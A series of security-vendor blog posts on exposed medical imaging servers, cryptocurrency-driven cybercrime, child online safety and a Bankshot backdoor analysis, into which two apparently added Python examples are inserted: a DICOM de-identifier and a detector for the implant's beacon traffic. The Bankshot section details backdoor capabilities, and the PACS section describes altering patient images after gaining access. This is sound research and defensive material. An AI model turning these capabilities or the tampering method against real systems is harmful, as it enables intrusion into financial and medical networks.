The medical world uses several image formats for different purposes. Each format has different requirements and works with different equipment, protocols, etc. A few format examples:

  • NIfTI: Neuroimaging Informatics Technology Initiative
  • DICOM: Digital Imaging and Communications in Medicine
  • MINC: Medical Imaging NetCDF
  • NRRD: Nearly Raw Raster Data

Searching open directories and FTP servers while using several search engines, we gathered thousands of images—some of them complete MRI scans, mostly in DICOM format. One example:

An open directory of images.

The DICOM format originated in the 1980s, before cybersecurity was a key component. The standard format contains a detailed list of tags such as patient name, station name, hospital, etc. All are included as metadata with the image.

Opening an image with a text editor presents the following screen:

An example of the DICOM file format.

The file begins with the prefix DICM, an indicator that we are dealing with a DICOM file. Other (now obscured) strings in this example include the hospital’s name, city, patient name, and more.

The Health Insurance Portability and Accountability Act requires a secure medical imaging workflow, which includes the removal or anonymizing of metadata in DICOM files. Researching the retrieved files from open sources and directories, we discovered most of the images still contained this metadata, such as in the following example, from which we extracted (obscured) personally identifiable information (PII).

Metadata discovered in a DICOM file.
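The metadata problem described here, and the closing advice later in the post to at least scrape the PII from images shared for research, can be addressed with a small de-identification pass. The following Python is an added example (not code from the post): it parses an Explicit VR Little Endian DICOM file, reports the identifying tags it finds, and blanks them in place. The sample file, hospital and patient are constructed.

```python
import struct

# VRs whose length field is 4 bytes (after 2 reserved bytes) in Explicit VR encoding.
LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"}
EXPLICIT_VR_LE = "1.2.840.10008.1.2.1"

# Standard DICOM tags that directly identify the patient or the institution.
PII_TAGS = {
    (0x0008, 0x0080): "InstitutionName",
    (0x0008, 0x0081): "InstitutionAddress",
    (0x0008, 0x0090): "ReferringPhysicianName",
    (0x0008, 0x1010): "StationName",
    (0x0010, 0x0010): "PatientName",
    (0x0010, 0x0020): "PatientID",
    (0x0010, 0x0030): "PatientBirthDate",
    (0x0010, 0x1040): "PatientAddress",
}


def encode_element(group, elem, vr, value):
    """Encode one data element in Explicit VR Little Endian (values padded to even length)."""
    if len(value) % 2:
        value += b"\x00" if vr == b"UI" else b" "
    head = struct.pack("<HH", group, elem) + vr
    if vr in LONG_VRS:
        return head + b"\x00\x00" + struct.pack("<I", len(value)) + value
    return head + struct.pack("<H", len(value)) + value


def iter_elements(data, pos):
    """Yield (tag, vr, value offset, value length) for each element starting at offset pos."""
    while pos + 8 <= len(data):
        group, elem = struct.unpack_from("<HH", data, pos)
        vr = data[pos + 4:pos + 6]
        if vr in LONG_VRS:
            length = struct.unpack_from("<I", data, pos + 8)[0]
            value_pos = pos + 12
        else:
            length = struct.unpack_from("<H", data, pos + 6)[0]
            value_pos = pos + 8
        if length == 0xFFFFFFFF or value_pos + length > len(data):
            raise ValueError("undefined-length or truncated element at offset %d" % pos)
        yield (group, elem), vr, value_pos, length
        pos = value_pos + length


def deidentify(dicom_bytes):
    """Return (cleaned file, {tag name: original value}) with PII tags blanked in place."""
    if dicom_bytes[128:132] != b"DICM":          # 128-byte preamble, then the DICM prefix
        raise ValueError("missing DICM prefix at offset 128")
    out = bytearray(dicom_bytes)
    removed = {}
    for tag, vr, vpos, length in iter_elements(dicom_bytes, 132):
        raw = dicom_bytes[vpos:vpos + length]
        if tag == (0x0002, 0x0010) and raw.rstrip(b"\x00").decode("ascii") != EXPLICIT_VR_LE:
            raise ValueError("this example only handles Explicit VR Little Endian data sets")
        if tag in PII_TAGS:
            removed[PII_TAGS[tag]] = raw.rstrip(b" \x00").decode("ascii")
            out[vpos:vpos + length] = b" " * length   # same length, so every offset stays valid
    return bytes(out), removed


def build_sample_file():
    """Constructed sample DICOM file: 128-byte preamble, 'DICM', meta group, small data set."""
    meta = encode_element(0x0002, 0x0010, b"UI", EXPLICIT_VR_LE.encode("ascii"))
    dataset = (
        encode_element(0x0008, 0x0060, b"CS", b"US")                    # modality: ultrasound
        + encode_element(0x0008, 0x0080, b"LO", b"Example Hospital")    # constructed values
        + encode_element(0x0008, 0x1010, b"SH", b"US-ROOM-3")
        + encode_element(0x0010, 0x0010, b"PN", b"DOE^JANE")
        + encode_element(0x0010, 0x0020, b"LO", b"PAT-0001")
        + encode_element(0x0010, 0x0030, b"DA", b"19800101")
        + encode_element(0x7FE0, 0x0010, b"OW", bytes(range(16)))      # stand-in pixel data
    )
    return b"\x00" * 128 + b"DICM" + meta + dataset


if __name__ == "__main__":
    cleaned, removed = deidentify(build_sample_file())
    print("blanked:", removed)
```

Blanking in place keeps the pixel data and every offset untouched, so the image still opens; a production workflow would also re-map UIDs and handle sequences and other transfer syntaxes, which this example deliberately refuses rather than mishandles.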

Combining Vulnerabilities and Metadata

We combined possible vulnerabilities and the metadata to create a test scenario, installing information from a dummy patient, including an x-ray picture of a knee, to the vulnerable PACS server.

Our test patient record, followed by an x-ray of a knee. 

Using vulnerability information gathered in an earlier phase of research, we launched an attack to gain access to the PACS server. Once we had access, we downloaded the image from our dummy patient and altered the metadata of the image series, changing all references of “knee” to “elbow.”

Altered metadata of the test patient image.

We then saved the picture and uploaded it to the server. Checking the records of our dummy patient, we found our changes were successful.

Changes successfully updated.

Reconstructing Body Parts

In the medical imaging world, a large array of software can investigate and visualize images in different ways, for example, in 3D. We took our collection of images, and using a demo version of 3D software, we reconstructed complete 3D models of vertebrae, pelvis, knees, etc. and, in one case, we reconstructed a partial face.

Because we firmly believe in protecting privacy, the following example—a series of images from a pelvis—comes from a demo file that accompanies the software.

An example of a series of images.

After selecting areas of interest and adjusting the levels, we generated a 3D model of the pelvis:

A 3D model of the pelvis.

The application that generated the 3D model has a feature that allowed us to export the model in several data formats to be used by other 3D drawing programs. After the export, we imported the data into a 3D drawing program and converted the file to STL, a popular format for 3D objects and printers.

In short, we began with files from open directories, transformed them into a 3D model, and printed a tangible model using a 3D printer:

Our 3D model of a pelvis.


When we began our investigation into the security status of medical imaging systems, we never expected we would conclude by reconstructing body parts. The amount of old software used in implementations of PACS servers and the amount of vulnerabilities discovered within the software itself are concerning. We investigated relatively few open-source vendors, but it begs the question: What more could we have found if we had access to professional hardware and software?

Default accounts, cross-site scripting, or vulnerabilities in the web server could lead to access to the systems. Our research demonstrates that once inside the systems, the data and pictures can be permanently altered.

In May 2017, one report claimed that through artificial intelligence pictures could be studied to determine how long a person will live. What if criminals could obtain that information and use it for extortion?

We understand the need for quickly sharing medical data for diagnosis and treatment and for storing medical images. We advise health care organizations to be careful when sharing images on open directories for research purposes and to at least scrape the PII data from the images.

For organizations using a PACS, ask your vendor about its security features. Employ a proper network design in which the sharing systems are properly secured. Think not only about internal security but also about the use of VPNs and two-factor authentication when connecting with external systems.


For more on the health care industry, follow @McAfee_Labs and catch up on all threat statistics from Q4 2017 in the March Threats Report.

The post McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals appeared first on McAfee Blogs.

McAfee Researchers Analyze Dark Side of Cryptocurrency Craze: Its Effect on Cybercrime

In December 2017 Bitcoin values skyrocketed, peaking at the unprecedented amount of roughly US$19,000 per coin. Unsurprisingly, the market for cryptocurrencies exploded in response. Investors, companies, and even the public found a fresh interest in digital currencies. However, the exciting change in Bitcoin value did not just influence your average wealth seeker. It also influenced vast underground cybercriminal markets, malware developers, and cybercriminal behavior.

Blessing and Curse

The surge of Bitcoin popularity and price per coin piqued the interest of cybercriminals, driving cryptocurrency hijacking in the last quarter of 2017. However, the same popularity and price jump also created a headache for bad actors. Ransomware techniques and the buying and selling of goods became problematic. The volatility of the Bitcoin market makes ransom costs hard to predict at the time of infection, and costs can surge upwards of $28 per transaction, complicating a criminal campaign. The volatility made mining, the act of using system resources to “mint” cryptocurrency, exceedingly difficult and raised transaction prices. This was especially true for Bitcoin, due to the high hash rate of its network. (The higher the hash rate, the more people they compete against.)

Cybercriminals will always seek to combine the highest returns in the shortest time with the least risk. With the Bitcoin surge, malware developers and underground markets found themselves in need of more stability, prompting a switch to other currencies and a resurgence of old techniques.

It is far easier to mine small currencies because the hash rate is generally more manageable and hardware requirements can be more accessible depending on the network design. Monero, for example, is ASIC resistant, meaning that specialized mining hardware does not have an overwhelming advantage over nonspecialized hardware. This allows the average computer to be more effective at the task. Because of this advantage, Monero is actively mined en masse by criminals using web-based miners on the machines of unsuspecting visitors. This intrusion is known as cryptojacking, which works by hijacking the browser session to use system resources. A quick look at recent examples of cryptojacking throws light on this issue. Starting in mid-2017, there has been a slew of instances in which major websites have found themselves compromised and unwittingly hosting the code, turning their users into mining bots. The public Wi-Fi at a Starbucks outlet was found to hijack browsers to mine Monero. Even streaming services such as YouTube have been affected through infected ads. Ironically, Monero is said to be one of the most private cryptocurrencies. Attacks such as these have also happened on Bitcoin, NEM, and Ethereum.

Criminals are also leveraging techniques beyond mining, such as cryptocurrency address or wallet hijacking. For example, Evrial, a Trojan for sale on underground markets, watches the Windows clipboard and replaces any cryptocurrency wallet addresses with its own malicious address. Essentially, this hijacks a user’s intended payment address to redirect funds. Unwitting users could accidentally pay a bad actor, losing their coins with essentially no chance of recovery.

A Brief Timeline

Cybercriminals have always faced the difficulty of securing their profits from government eyes. For the cybercriminal, banks present risk. If a transfer is deemed illegal or fraudulent, the bank transfer can easily be traced and seized by the bank or law enforcement. Trading in traditional currencies requires dealing with highly regulated entities that have a strong motivation to follow the rules. Any suspicious activity on their systems could easily result in the seizure of funds. Cybercriminals have long tried to solve this problem using various digital currencies, the prelude to cryptocurrencies. When cryptocurrencies were introduced to the world, cybercriminals were quick to adapt. However, with this adoption came Trojans, botnets, and other hacker activities designed specifically for the new technology.

The evolution of digital currencies. Despite various attacks from bad actors, digital money continues to evolve.

1996: E-gold appeared, and quickly became popular with cybercriminals due to its lack of verification on accounts. This was certainly welcome among “carder groups” such as ShadowCrew, which trafficked in stolen credit cards and other financial accounts. However, with three million accounts, e-gold’s popularity among criminals also caused its demise: It was taken down just 10 years later by the FBI, even after attempts in 2005 to rein in criminal activity. Accounts were seized and the founder indicted, collapsing all e-gold operations.

2005: Needing another avenue after the collapse of e-gold, cybercriminals migrated to WebMoney, established in 1998. Unlike e-gold, WebMoney successfully discouraged the bulk of cybercriminals by modifying business practices to prevent illegal activities. This kept the organization alive but pushed many cybercriminals to find a new payment system.

2006: Liberty Reserve took on much of the burgeoning cybercriminal demand. The institution got off to a rocky start with cybercriminals due to the almost immediate arrest of its founders. The company’s assets were seized in 2013—causing an estimated $6 billion in lost criminal funds.

2009: Cybercriminals were increasingly desperate for a reliable and safe payment system. Enter Bitcoin, a decentralized, pseudo-anonymous payment system built on blockchain technology. With WebMoney usage growing increasingly difficult for cybercriminals and Liberty Reserve under scrutiny from world governments, cybercriminals required something new. Within the Bitcoin network, no central authority had the power to make decisions or otherwise seize funds. These protections against centralized seizures, as well as many of its anonymity features, were a major influence in the migration of cybercriminals to Bitcoin.

Game Changers

By 2013 cybercriminals had a vested interest in cryptocurrencies, primarily Bitcoin. Cryptocurrency-related malware was in full swing, as evidenced by increasingly sophisticated botnet miner kits such as BitBot. Large enterprises such as Silk Road, primarily a drug market, thrived on the backbone of cryptocurrency popularity. Then three major events dramatically changed the way cybercriminals operated.

Silk Road closed: The popular black market and first major modern cryptocurrency “dark net” market was shut down by the FBI. The market was tailored to drug sales, and the FBI takedown left its buyers and sellers without a place to sell their goods. The migration of buyers and sellers to less restrictive markets enabled cross-sales to a much larger audience than was previously available to cybercriminals. Buyers of drugs could now also buy stolen data—including Netflix accounts or credit cards—from new markets such as AlphaBay as demand increased.

Major retailers breached: Millions of credit card records were stolen and available, raising the demand for underground markets to buy and sell the data. Dark net markets already offering malware and other goods and services took up the load. Agora, Black Market Reloaded and, shortly thereafter, AlphaBay responded to that demand. Although many of these markets were scams, a few such as AlphaBay, which survived until its July 2017 takedown, were hugely successful. Through these markets, cybercriminals had access to a much larger audience and could benefit from centralized structures and advertising. The demand for other types of stolen data rose even more, particularly streaming media accounts and personally identifiable information, which carries a high financial return for cybercriminals.

In the past, many of the credit card records were sold on forums and other specialized carding sites, such as Rescator. The new supply of credit card data was so massive, however, that it enabled secondhand sales and migration into broader markets. Dark net markets were simply more scalable than forums, thus enabling their further growth. New players joining the game now had easy access to goods, stolen data, and customers. This shift reshaped and enabled retail targeting as it exists today.

Cryptocurrency-based ransomware introduced: Outside of dark net markets, malware developers sought to acquire cryptocurrencies. Prior to 2013 the primary method to maliciously acquire coin was through mining. Less effective methods included scams, such as TOR-clone sites, fake markets, or Trojans designed to steal private keys to wallets. By late 2013 malware developers and botnet owners sold their malware at a premium by including mining software alongside the usual items such as credit cards and password scrapers. However, at a cost of around $250 per coin, Bitcoin miners did not immediately see higher profits than they could manage with focused scraper malware. Criminals needed more reliable ways of acquiring coins.

Ransomware, a potentially lucrative form of malware, was already on the rise using other digital currencies. In late 2013, the major ransomware family CryptoLocker included a new option for ransomware victims—to pay via Bitcoin. The tactic effectively created a frenzy of copycat malware. Now malware developers could outpace the profits of scraper malware as well as secure currency for the underground market. Ransomware quickly enjoyed several immensely successful campaigns, many of which, including Locky and Samsa, are still popular. Open-source tools such as Hidden Tear allowed low-skilled players to enter the market and acquire cryptocurrencies through ransomware with only limited coding knowledge. The thriving model ransomware as a service emerged with TOX, sold via a TOR hidden service in 2015.

The use of cryptocurrencies by malicious actors has grown substantially since their inception in 2009. Cryptocurrencies meet a need and have been exploited in ever-evolving ways since their introduction. The influence of cryptocurrencies on underground markets, malware development, and attacker behavior cannot be overstated. As markets change and adopt cryptocurrencies, we will surely see further responses from cybercriminals.


“Dynamic Changes in Underground Markets,” by Charles McFarland. Cyber Security Practitioner, Vol. 2, Issue 11. November 2016.

The post McAfee Researchers Analyze Dark Side of Cryptocurrency Craze: Its Effect on Cybercrime appeared first on McAfee Blogs.

Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online

Having a hard time doing what needs to be done to keep your kids safe online? Do you mentally shrink back when you realize you don’t do any of the tips experts so often recommend? Let the guilt go, parent, because you are not alone.

Family life moves at warp speed. We want to keep up, we do everything we can to keep up, but sometimes — depending on the season of life — our best intentions get left on the roadside gulping dust.

So if you feel like you are falling behind, we put together this quick cheat sheet that will allow you to cover your safety bases and regain some ground on the technology front.

6 Easy Things You Can Do to Keep Your Kids Safe Online

Ask about apps

Restrictions on apps exist for a reason. Glance through your child’s home screen and ask about any app you don’t recognize. If you are unsure about an app’s functionality, audience, or risks, dig deeper. This step covers a lot of ground since apps are the #1 way tweens and teens gain access to mature content.

YouTube Safety Mode

Your kids probably spend a ton of time watching videos online, and who knows what their eyes have seen or what links they’ve clicked. What you may not realize is that YouTube has a safety feature that will block most inappropriate or sexual content from search, related videos, playlists, shows, and films. For kids under four, there’s YouTube Kids.

Google SafeSearch

While it’s not going to be as powerful as filtering software, Google has a SafeSearch feature that will filter explicit content (links, videos, and images) on any device. Google also has a reporting system if anything gets through their feature.

Verify Privacy Settings

This step is a five-minute conversation with your child that will remove some risks. If your child is on Facebook, Instagram, Snapchat or Twitter, make sure their privacy settings are marked “private.” This will keep anyone outside of their friend group from connecting with them. As part of the privacy settings chat, review strong password practices.

Relationship over rules

The #1 way to safeguard your kids against online risk is making sure you have a strong relationship. Spend tech-free time together, listen, and observe how your child uses and enjoys his or her devices. A healthy parent-child relationship is foundational to raising a wise digital citizen who can make good choices and handle issues such as cyberbullying, sexting, conflict, or online scams. Connect with your child daily. Talk about what’s new with school, their friends, and anything else important to them. Along the way, you’ll find out plenty about their online life and have the necessary permission (and trust) to work your concerns about online safety into any conversation.

Friend and follow but don’t stalk

Many parents cringe at the thought of opening a Twitter or Snapchat account, but if that is where your child spends most of his or her time, it’s time to open an account. It’s easy by the way. The wise rule here is that once you follow your child, give them space and privacy. Don’t chime in on the conversation or even compliment them. While they may appreciate your “likes” on Instagram, they aren’t too happy with “mom comments” as my daughter calls them. If you have a concern about a photo or comment your child has uploaded, handle it through a Direct Message or face to face but never in the public feed.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online appeared first on McAfee Blogs.

New traces of Hacking Team in the wild

Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone.

The post New traces of Hacking Team in the wild appeared first on WeLiveSecurity

Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant

This post was prepared with contributions from Asheer Malhotra, Charles Crawford, and Jessica Saavedra-Morales. 

On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.

In this new, aggressive campaign we see a return of the Bankshot implant, which last appeared in 2017. Bankshot is designed to persist on a victim’s network for further exploitation; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations.

Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.

Further investigation into this campaign and analysis of McAfee product telemetry shows that the infection occurred on March 2 and 3. The implant’s first target was a major government-controlled financial organization. It next appeared in another Turkish government organization involved in finance and trade. A further three large financial institutions in Turkey were victims of this attack. The implant has so far not surfaced in any other sector or country. This campaign suggests the attackers may plan a future heist against these targets by using Bankshot to gather information.

Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.

Bankshot implants hosted on

The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from

We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with to install Bankshot and also contain themes around cryptocurrency security.

Two Flash files exploit CVE-2018-4878.

  • 843c17b06a3aee22447f021307909890b68828b9 (February 25)
  • 343ebca579bb888eb8ccb811f9b52280c72e484c (February 25)
Malicious documents in the attack.


Malicious document exploiting CVE-2018-4878.

The implants are downloaded via a Flash file embedded in the malicious document. They are executed when the victim views the document.

The malicious site embedded in the Flash file.
Implant directory contained in the malicious Flash file.

The implants (DLLs) are disguised as ZIP files and communicate with three control servers, two of them Chinese-language online gambling sites. These URLs can be found hardcoded in the implants’ code.

Hardcoded control server URLs.


Analyzing Bankshot

The sample (a2e966edee45b30bb6bb5c978e55833eec169098) is a Windows DLL that serves as a backdoor and contains a variety of capabilities. The malicious DLL is not a service DLL because it lacks ServiceMain(). To mask itself, it can run as a regular library loaded into a legitimate process.

The malware begins by creating a new thread from the DllMain() function to carry out its malicious activities:

New thread created in the malware’s DllMain() function.

The malware performs the following activities:

  • Builds imports by dynamically loading APIs
  • Decrypts strings needed for control server communications
  • Performs control server communications
  • Handles commands issued by the control server
  • Uninstalls self from the system

The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress(). APIs from the following libraries are loaded at runtime:

  • Kernel32.dll
  • Ws2_32/wsock32.dll
  • Advapi32.dll
  • Oleaut32.dll
  • Iphlp.dll
  • Urlmon.dll
A dynamic API loaded by the malware.


Based on packet capture analysis of previous implants from 2017, the following strings are used in control server communications:

  • Connection: keep-alive
  • Cache-Control: max-age=0
  • Accept: */*
  • Content-Type: multipart/form-data; boundary=
  • Content-Type: application/octet-stream
  • Accept-Encoding: gzip,deflate,sdch
  • Accept-Language: ko-KR -> Korean
  • Content-Disposition: form-data;name="board_id"
  • Content-Disposition: form-data;name="user_id"
  • Content-Disposition: form-data;name="file1"; filename="img01_29.jpg"
  • Content-Disposition: form-data;name="file1"; filename="my.doc"
  • Content-Disposition: form-data;name="file1"; filename="pratice.pdf"
  • Content-Disposition: form-data;name="file1"; filename="king.jpg"
  • Content-Disposition: form-data;name="file1"; filename="dream.avi"
  • Content-Disposition: form-data;name="file1"; filename="hp01.avi"
  • Content-Disposition: form-data;name="file1"; filename="star.avi"

User Agents

The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary:

Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36

Control Server Communications

The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data, such as:

Content-Disposition: form-data; name="board_id"

Content-Disposition: form-data; name="user_id"

Content-Disposition: form-data; name="file1"; filename="king.jpg"
Content-Type: application/octet-stream
  • board_id is a four-digit number that may be an identifier for a campaign ID. Based on analysis of previous samples, this is a unique identifier.
  • user_id is a hardcoded value in the malware binary that is sent to the control server. The username appears to be attacker specified and has occurred in 2017 Bankshot samples. This links the previous samples with this unique username.
  • filename is based on static analysis. This looks like a specific beacon to indicate that the malware is ready to receive commands.

The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:

  • Commands received from the control server are encoded DWORDs
  • After decoding, these DWORDs should be in the range 123459h to 123490h

Malware checking to make sure a received command is in the correct range.

The command index calculator and jump to the appropriate command.

The command index table and command handler address table.
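As an added example (not McAfee's code), the following Python detection helper turns the beacon description above into a check that can be run over captured HTTP POSTs: it splits the multipart body, looks for the board_id / user_id / file1 fields with the king.jpg filename and the default user agent, and mirrors the implant's own range check on a decoded command DWORD. The sample request, the boundary string, the field values and the indicator labels are all constructed here; only the user agent, field names, filename and command range come from the analysis.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicators quoted from the analysis above.
DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36"
BEACON_FILENAME = "king.jpg"
CMD_MIN, CMD_MAX = 0x123459, 0x123490   # accepted range of a decoded command DWORD


@dataclass
class Part:
    """One part of a multipart/form-data body."""
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    body: bytes


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data splitter (CRLF line endings, no nested parts)."""
    delim = b"--" + boundary.encode("latin-1")
    parts: List[Part] = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers: Dict[str, str] = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        # (?<![a-z]) keeps name="..." from matching inside filename="..."
        name = re.search(r'(?<![a-z])name="([^"]*)"', disposition)
        fname = re.search(r'filename="([^"]*)"', disposition)
        parts.append(Part(
            name=name.group(1) if name else "",
            filename=fname.group(1) if fname else None,
            content_type=headers.get("content-type"),
            body=data.rstrip(b"\r\n"),
        ))
    return parts


def beacon_indicators(headers: Dict[str, str], body: bytes) -> List[str]:
    """Return the Bankshot beacon traits found in one captured HTTP POST.

    `headers` keys must be lower-cased. The trait labels are constructed here."""
    hits: List[str] = []
    if headers.get("user-agent") == DEFAULT_UA:
        hits.append("default-user-agent")
    boundary = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if not boundary:
        return hits
    parts = {p.name: p for p in parse_multipart(body, boundary.group(1).strip('"'))}
    board = parts.get("board_id")
    if board and re.fullmatch(rb"\d{4}", board.body):
        hits.append("board_id-four-digits")
    if "user_id" in parts:
        hits.append("user_id-field")
    upload = parts.get("file1")
    if (upload and upload.filename == BEACON_FILENAME
            and upload.content_type == "application/octet-stream"):
        hits.append("king.jpg-beacon")
    return hits


def is_valid_command(decoded: int) -> bool:
    """Mirror of the implant's own sanity check on a decoded command DWORD."""
    return CMD_MIN <= decoded <= CMD_MAX


# Constructed sample traffic (not a real capture).
BOUNDARY = "----ConstructedBoundary0001"
SAMPLE_HEADERS = {
    "content-type": f"multipart/form-data; boundary={BOUNDARY}",
    "user-agent": DEFAULT_UA,
    "accept-language": "ko-KR",
}
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"board_id\"\r\n\r\n1234\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"user_id\"\r\n\r\nuser01\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"file1\"; filename=\"king.jpg\"\r\n"
    f"Content-Type: application/octet-stream\r\n\r\n\x00\x01\x02\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("latin-1")

# A benign-looking upload with the same field names but a different file.
BENIGN_BODY = SAMPLE_BODY.replace(b'filename="king.jpg"', b'filename="photo.png"')

if __name__ == "__main__":
    print("sample :", beacon_indicators(SAMPLE_HEADERS, SAMPLE_BODY))
    print("benign :", beacon_indicators({**SAMPLE_HEADERS, "user-agent": "curl/7.0"}, BENIGN_BODY))
    print("0x123460 accepted:", is_valid_command(0x123460))
```

A single field match is weak on its own; the combination of all four traits on one request is what makes the beacon worth alerting on.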

Implant Capabilities

Based on the responses received from the control server, the malware can carry out the following malicious tasks:

  • Recursively generate a list of files in a directory and send it to the control server
  • Terminate a specific process. The process is identified by the control server sending the PID to the malware.

The capability to terminate a process.

  • Gather network addresses and operating system version
  • Execute arbitrary commands using “cmd.exe /c”

The capability to execute system commands.

Spawning arbitrary processes.

  • Create processes
  • Write responses from the control server to a file
  • Send information for all drives
  • Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00*
  • Change the time of a file as specified by the control server

The malware changing the file time.

  • Create a process by impersonating a logged-on user

Getting a user token using WTSQueryUserToken.

A process created as logged-in user.

  • Gather the process time for all processes

Getting time information for all processes running on the system.

  • Gather domain and account names based on all running processes

Gathering account information from running processes.

  • Read a specified file’s contents and send the data to the control server
  • Write data sent by the control server to an existing file
  • Mark a file to be deleted on reboot

Marking a file for deletion on reboot.

  • Overwrite a file with all zeros and mark it for deletion on reboot

Wiping files with zeros and marking them for deletion on reboot.

  • Delete files using the DeleteFile() API
  • Load an arbitrary library into its process space. This may be used to load additional downloaded components of the attack.

Loading an arbitrary library into its own process space.

After every action is performed the malware sends a response to the control server indicating whether the action was successful.


The US government reports that Bankshot is used by Hidden Cobra to target multiple industries including financial organizations. This implant has been connected to a major Korean bank attack and is also known as Trojan Manuscript. That variant contained the capability to search for hosts related to the SWIFT network and the same control server strings as the variant we found targeting the Turkish financial sector. The implant does not conduct financial transactions; rather it is a channel into the victim’s environment, in which further stages of implants can be deployed for financial reconnaissance. The Bankshot implant was also observed in 2017 in documents appearing to come from Latin American banks.

Malicious document delivering the Bankshot implant in 2017.

These connections, combined with the implant’s nearly identical appearance to known variants, are a strong indication that we have uncovered a Hidden Cobra attack. Further, previous implants from 2017 contained bogus documents with financially themed content.

A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017). 


We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries). In this campaign, we see the adoption of a recent zero-day Adobe Flash vulnerability to get the implant onto the victim’s systems.

The campaign has a high chance of success against victims who have an unpatched version of Flash. Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal. This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017.

McAfee detects these threats as:

  • RDN/Generic Exploit
  • RDN/Generic.dx
  • Generic PWS.y
  • Generic.hbg
  • Exploit-CVE2018-4878

McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rates these URLs as High Risk.


Indicators of Compromise

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Commonly used port
  • Command-line interface
  • Service execution
  • Automated collection
  • Data from local system
  • Process discovery
  • System time discovery
  • Credential dumping
  • Exploitation of vulnerability
  • Process injection
  • File deletion






The post Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant appeared first on McAfee Blogs.

A Map of the Most Dangerous Sources of Cybercrime

This blog post was written by James Andrew Lewis, senior vice president at the Center for Strategic and International Studies (CSIS). 

Now that 3 companies and 13 individuals from Russia have been indicted for U.S. election interference, the general American populace has insight into a problem that has been growing for years: Russia has little respect for the law. In fact, based on a recent study on the Economic Impact of Cybercrime that CSIS undertook with McAfee, Russia leads the world in cybercrime. This reflects both the skill of its hacker community and its disdain for western law enforcement.

The complex and close relationship between the Russian state and organized crime means that Russia provides a sanctuary for the most advanced cybercriminals, who focus on the financial sector. The best cybercriminals in the world live in Russia, and as long as they do not travel to countries where they could be arrested, they are largely immune from prosecution. For example, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts and transferring the PII to the Russian government, also used the stolen data for spam and credit card fraud for personal benefit.

Yet Russia is hardly the only country specializing in cybercrime; China, North Korea, and Iran are right up there. The combination of massive budgets, access to talent and protection from law enforcement make nation-states the most dangerous source of cybercrime, which our report estimates takes about a $600 billion toll on the global economy.

